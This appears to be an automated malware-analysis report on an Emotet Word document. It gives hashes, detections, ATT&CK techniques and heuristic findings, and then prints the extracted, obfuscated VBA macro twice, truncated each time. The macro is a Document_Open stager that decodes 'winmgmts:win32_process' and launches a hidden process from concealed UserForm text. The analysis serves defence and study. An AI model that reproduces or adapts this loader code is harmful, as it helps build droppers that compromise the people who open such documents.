Emotet Office (OLE) malware analysis — malicious · 0107a277fb1b3f3c

MALICIOUS

Office (OLE)

167.1 KB Created: 2020-08-05 22:25:00 Authoring application: Microsoft Office Word First seen: 2020-09-04

MD5: 2c6fa47c5d23832cf22e78795618afb6 SHA-1: 0e6a78ac19de2fd73d193c67222d139325bc9d2e SHA-256: 0107a277fb1b3f3cf150d6ee41e1d1c89f89bc1a7ccb698c511115cb823197f4

262 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains VBA macros, including a Document_Open auto-execution macro and a hidden UserForm command stager, which are hallmarks of Emotet. The ClamAV detection also explicitly names Emotet. The VBA code likely uses CreateObject to execute a downloaded payload, a common technique for this family. The embedded URL was confirmed benign and is not considered a primary IOC.

Heuristics 7

ClamAV: Doc.Dropper.EmotetIOS-9402070-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.EmotetIOS-9402070-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4651 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4651 bytes
SHA-256: `ccdfcb602240c3e01d9229dcdd23fc5c43b16f6630167be7f8296c588cea42ed`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "HXVUUejoissa" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub _ Document_open() OOFHKmiebwhtn.XESAYkhnuecwrrm End Sub Attribute VB_Name = "OOFHKmiebwhtn" Attribute VB_Base = "0{8624FB89-A8D3-4117-9911-205E5F1165C7}{FA24B5FA-5B47-4C6D-B66B-89A67F8F1322}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function XESAYkhnuecwrrm() Dim G0ÀqE8ÎByw As String G0ÀqE8ÎByw = Replace$("IR8ÈFrToPGGvM", "IR8ÈFrTo", "dfIepuna") Dim Jbw As Integer Jbw = 5 Do While Jbw < 5 + 6 Jbw = Jbw + 9: DoEvents Loop Dim MRK As String MRK = Replace$("NOb8ÄEg8kT4Zh", "NOb8ÄEg8k", "Vfw") MBEXSuqsdmrkqwrn = Chr(OOFHKmiebwhtn.Zoom + ((10 + 100 + 10) / 8)) Dim IKmJU As Integer IKmJU = 3 Do While IKmJU < 3 + 5 IKmJU = IKmJU + 7: DoEvents Loop EXGYDhkahbgebwi = "8n3n3n34 89y128ghuu(^yhus78bbu8n3n3n34 89y128ghuu(^yhus78bbuw8n3n3n34 89y128ghuu(^yhus78bbui8n3n3n34 89y128ghuu(^yhus78bbunm8n3n3n34 89y128ghuu(^yhus78bbu8n3n3n34 89y128ghuu(^yhus78bbugm8n3n3n34 89y128ghuu(^yhus78bbut8n3n3n34 89y128ghuu(^yhus78bbu8n3n3n34 89y128ghuu(^yhus78bbu" + MBEXSuqsdmrkqwrn + "8n3n3n34 89y128ghuu(^yhus78bbu8n3n3n34 89y128ghuu(^yhus78bbu:8n3n3n34 89y128ghuu(^yhus78bbuw8n3n3n34 89y128ghuu(^yhus78bbuin8n3n3n34 89y128ghuu(^yhus78bbu8n3n3n34 89y128ghuu(^yhus78bbu38n3n3n34 89y128ghuu(^yhus78bbu28n3n3n34 89y128ghuu(^yhus78bbu_8n3n3n34 89y128ghuu(^yhus78bbu" + OOFHKmiebwhtn.RNVCZqrolmhl + "8n3n3n34 89y128ghuu(^yhus78bburo8n3n3n34 89y128ghuu(^yhus78bbu8n3n3n34 89y128ghuu(^yhus78bbuce8n3n3n34 89y128ghuu(^yhus78bbus8n3n3n34 89y128ghuu(^yhus78bbus8n3n3n34 89y128ghuu(^yhus78bbu" Dim dcSTK4âq8ÃW As String dcSTK4âq8ÃW = Replace$("DHBnOjfiNZahw1Òa", "DHBnOjfiN", "bAiIFgfVja") OKXPNvfeynqbukiphcu = OOKBRmuqjdcrte(EXGYDhkahbgebwi) Dim ITXRER As Integer ITXRER = 2 Do While ITXRER < 2 + 7 ITXRER = ITXRER + 9: DoEvents Loop Set BDHGXqjvrmqdlin = CreateObject(OKXPNvfeynqbukiphcu) Dim lAUehL8ÑG As String lAUehL8ÑG = Replace$("XMoYVoTQtfrL", "XMoYVoT", "emFbI") KMDBVndycaktnxwm = OOFHKmiebwhtn.KFHTBzyrscnkocfgjx.ControlTipText Dim NZ5ËgnTc As Integer NZ5ËgnTc = 7 Do While NZ5ËgnTc < 7 + 2 NZ5ËgnTc = NZ5ËgnTc + 2: DoEvents Loop IDRTHdijvigj = isi2n2j3k4 + (OKXPNvfeynqbukiphcu + MBEXSuqsdmrkqwrn + OOFHKmiebwhtn.HSSCVskozbyqyii.ControlTipText + KMDBVndycaktnxwm) Dim nON0ÇhIOIK As Integer nON0ÇhIOIK = 8 Do While nON0ÇhIOIK < 8 + 8 nON0ÇhIOIK = nON0ÇhIOIK + 4: DoEvents Loop IYPISvfjhkmklspfz = IDRTHdijvigj + OOFHKmiebwhtn.RNVCZqrolmhl Dim SM0iX As Integer SM0iX = 8 Do While SM0iX < 8 + 5 SM0iX = SM0iX + 9: DoEvents Loop Set JSJDJatqrzutk = HQUZItllxidcnnnr(IYPISvfjhkmklspfz) Dim ETZpw As Integer ETZpw = 3 Do While ETZpw < 3 + 4 ETZpw = ETZpw + 7: DoEvents Loop mnb6jn3j = Array("usf", BDHGXqjvrmqdlin. _ Create(ZHJUPidwvredxhdymfo, NTKGNkjmrcpoac, JSJDJatqrzutk), "nsd jehh") Dim g1åYXNNSUar As String g1åYXNNSUar = Replace$("jTeicPLHL", "jTeicP", "cUjcG") End Function Function HQUZItllxidcnnnr(NKTEOqpjpdirywot) Set HQUZItllxidcnnnr = CreateObject(NKTEOqpjpdirywot) Dim jh1M As String jh1M = Replace$("LCRKbiOXFcauqtY", "LCRKbiOXFc", "lyBt5À") HQUZItllxidcnnnr. _ showwindow = AZZVKxrqhitm + AZLQNcvarxhllhtclo + FXPGFlkkvddyuxpmrqy Dim XN21á4ÍUj As String XN21á4ÍUj = Replace$("nVtbB0ÈHLRCM", "nVtbB0ÈHL", "KjhIHvL") End Function Function OOKBRmuqjdcrte(OHXWYefwmect) ICREJfrxkphfwb = OHXWYefwmect Dim XFcLa As String XFcLa = Replace$("QmUea0ÅdZcGS3SUj", "QmUea0ÅdZcG", "CH0ÜiOXF") SFWRRaksafqspcuzl = Split _ (ICREJfrxkphfwb, "8n3n3n34 89y" + "128ghuu*(^yhus78bbu") Dim dZc1É As String dZc1É = Replace$("EYSUj3ÓVtbBLHL7Û3Ô1ÛG", "EYSUj3ÓVtbB", "Mauq8ÈM") JIEUImdkzowrvpfm = k6o3o3j + Join(SFWRRaksafqspcuzl, oj6jk) Dim rJgNXUtq ... (truncated)

SHA-256: ccdfcb602240c3e01d9229dcdd23fc5c43b16f6630167be7f8296c588cea42ed

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "HXVUUejoissa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
OOFHKmiebwhtn.XESAYkhnuecwrrm
End Sub


Attribute VB_Name = "OOFHKmiebwhtn"
Attribute VB_Base = "0{8624FB89-A8D3-4117-9911-205E5F1165C7}{FA24B5FA-5B47-4C6D-B66B-89A67F8F1322}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function XESAYkhnuecwrrm()
Dim G0ÀqE8ÎByw As String
G0ÀqE8ÎByw = Replace$("IR8ÈFrToPGGvM", "IR8ÈFrTo", "dfIepuna")
Dim Jbw As Integer
Jbw = 5
Do While Jbw < 5 + 6
Jbw = Jbw + 9: DoEvents
Loop
Dim MRK As String
MRK = Replace$("NOb8ÄEg8kT4Zh", "NOb8ÄEg8k", "Vfw")
MBEXSuqsdmrkqwrn = Chr(OOFHKmiebwhtn.Zoom + ((10 + 100 + 10) / 8))
Dim IKmJU As Integer
IKmJU = 3
Do While IKmJU < 3 + 5
IKmJU = IKmJU + 7: DoEvents
Loop
EXGYDhkahbgebwi = "8n3n3n34 89y128ghuu*(^yhus78bbu8n3n3n34 89y128ghuu*(^yhus78bbuw8n3n3n34 89y128ghuu*(^yhus78bbui8n3n3n34 89y128ghuu*(^yhus78bbunm8n3n3n34 89y128ghuu*(^yhus78bbu8n3n3n34 89y128ghuu*(^yhus78bbugm8n3n3n34 89y128ghuu*(^yhus78bbut8n3n3n34 89y128ghuu*(^yhus78bbu8n3n3n34 89y128ghuu*(^yhus78bbu" + MBEXSuqsdmrkqwrn + "8n3n3n34 89y128ghuu*(^yhus78bbu8n3n3n34 89y128ghuu*(^yhus78bbu:8n3n3n34 89y128ghuu*(^yhus78bbuw8n3n3n34 89y128ghuu*(^yhus78bbuin8n3n3n34 89y128ghuu*(^yhus78bbu8n3n3n34 89y128ghuu*(^yhus78bbu38n3n3n34 89y128ghuu*(^yhus78bbu28n3n3n34 89y128ghuu*(^yhus78bbu_8n3n3n34 89y128ghuu*(^yhus78bbu" + OOFHKmiebwhtn.RNVCZqrolmhl + "8n3n3n34 89y128ghuu*(^yhus78bburo8n3n3n34 89y128ghuu*(^yhus78bbu8n3n3n34 89y128ghuu*(^yhus78bbuce8n3n3n34 89y128ghuu*(^yhus78bbus8n3n3n34 89y128ghuu*(^yhus78bbus8n3n3n34 89y128ghuu*(^yhus78bbu"
Dim dcSTK4âq8ÃW As String
dcSTK4âq8ÃW = Replace$("DHBnOjfiNZahw1Òa", "DHBnOjfiN", "bAiIFgfVja")
OKXPNvfeynqbukiphcu = OOKBRmuqjdcrte(EXGYDhkahbgebwi)
Dim ITXRER As Integer
ITXRER = 2
Do While ITXRER < 2 + 7
ITXRER = ITXRER + 9: DoEvents
Loop
Set BDHGXqjvrmqdlin = CreateObject(OKXPNvfeynqbukiphcu)
Dim lAUehL8ÑG As String
lAUehL8ÑG = Replace$("XMoYVoTQtfrL", "XMoYVoT", "emFbI")
KMDBVndycaktnxwm = OOFHKmiebwhtn.KFHTBzyrscnkocfgjx.ControlTipText
Dim NZ5ËgnTc As Integer
NZ5ËgnTc = 7
Do While NZ5ËgnTc < 7 + 2
NZ5ËgnTc = NZ5ËgnTc + 2: DoEvents
Loop
IDRTHdijvigj = isi2n2j3k4 + (OKXPNvfeynqbukiphcu + MBEXSuqsdmrkqwrn + OOFHKmiebwhtn.HSSCVskozbyqyii.ControlTipText + KMDBVndycaktnxwm)
Dim nON0ÇhIOIK As Integer
nON0ÇhIOIK = 8
Do While nON0ÇhIOIK < 8 + 8
nON0ÇhIOIK = nON0ÇhIOIK + 4: DoEvents
Loop
IYPISvfjhkmklspfz = IDRTHdijvigj + OOFHKmiebwhtn.RNVCZqrolmhl
Dim SM0iX As Integer
SM0iX = 8
Do While SM0iX < 8 + 5
SM0iX = SM0iX + 9: DoEvents
Loop
Set JSJDJatqrzutk = HQUZItllxidcnnnr(IYPISvfjhkmklspfz)
Dim ETZpw As Integer
ETZpw = 3
Do While ETZpw < 3 + 4
ETZpw = ETZpw + 7: DoEvents
Loop
mnb6jn3j = Array("usf", BDHGXqjvrmqdlin. _
Create(ZHJUPidwvredxhdymfo, NTKGNkjmrcpoac, JSJDJatqrzutk), "nsd jehh")
Dim g1åYXNNSUar As String
g1åYXNNSUar = Replace$("jTeicPLHL", "jTeicP", "cUjcG")
End Function
Function HQUZItllxidcnnnr(NKTEOqpjpdirywot)
Set HQUZItllxidcnnnr = CreateObject(NKTEOqpjpdirywot)
Dim jh1M As String
jh1M = Replace$("LCRKbiOXFcauqtY", "LCRKbiOXFc", "lyBt5À")
HQUZItllxidcnnnr. _
showwindow = AZZVKxrqhitm + AZLQNcvarxhllhtclo + FXPGFlkkvddyuxpmrqy
Dim XN21á4ÍUj As String
XN21á4ÍUj = Replace$("nVtbB0ÈHLRCM", "nVtbB0ÈHL", "KjhIHvL")
End Function
Function OOKBRmuqjdcrte(OHXWYefwmect)
ICREJfrxkphfwb = OHXWYefwmect
Dim XFcLa As String
XFcLa = Replace$("QmUea0ÅdZcGS3SUj", "QmUea0ÅdZcG", "CH0ÜiOXF")
SFWRRaksafqspcuzl = Split _
(ICREJfrxkphfwb, "8n3n3n34 89y" + "128ghuu*(^yhus78bbu")
Dim dZc1É As String
dZc1É = Replace$("EYSUj3ÓVtbBLHL7Û3Ô1ÛG", "EYSUj3ÓVtbB", "Mauq8ÈM")
JIEUImdkzowrvpfm = k6o3o3j + Join(SFWRRaksafqspcuzl, oj6jk)
Dim rJgNXUtq
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.